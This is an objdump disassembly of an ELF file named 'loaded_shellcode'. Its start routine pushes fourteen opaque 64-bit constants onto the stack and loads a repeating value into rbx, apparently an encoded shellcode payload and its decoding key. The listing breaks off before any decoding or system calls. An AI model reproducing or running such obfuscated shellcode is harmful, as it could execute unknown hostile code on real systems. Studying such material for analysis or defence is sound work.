
loaded_shellcode:     file format elf64-x86-64


Disassembly of section .text:

<_start>:
	movabs rax,0xa284ee5c7cde4bd7
	push   rax
	movabs rax,0x935add110510849a
	push   rax
	movabs rax,0x10b29a9dab697500
	push   rax
	movabs rax,0x200ce3eb0d96459a
	push   rax
	movabs rax,0xe64c30e305108462
	push   rax
	movabs rax,0x69cd355c7c3e0c51
	push   rax
	movabs rax,0x65659a2584a185d6
	push   rax
	movabs rax,0x69ff00506c6c5000
	push   rax
	movabs rax,0x3127e434aa505681
	push   rax
	movabs rax,0x6af2a5571e69ff48
	push   rax
	movabs rax,0x6d179aaff20709e6
	push   rax
	movabs rax,0x9ae3f152315bf1c9
	push   rax
	movabs rax,0x373ab4bb0900179a
	push   rax
	movabs rax,0x69751244059aa2a3
	push   rax
	movabs rbx,0x2144d2144d2144d2
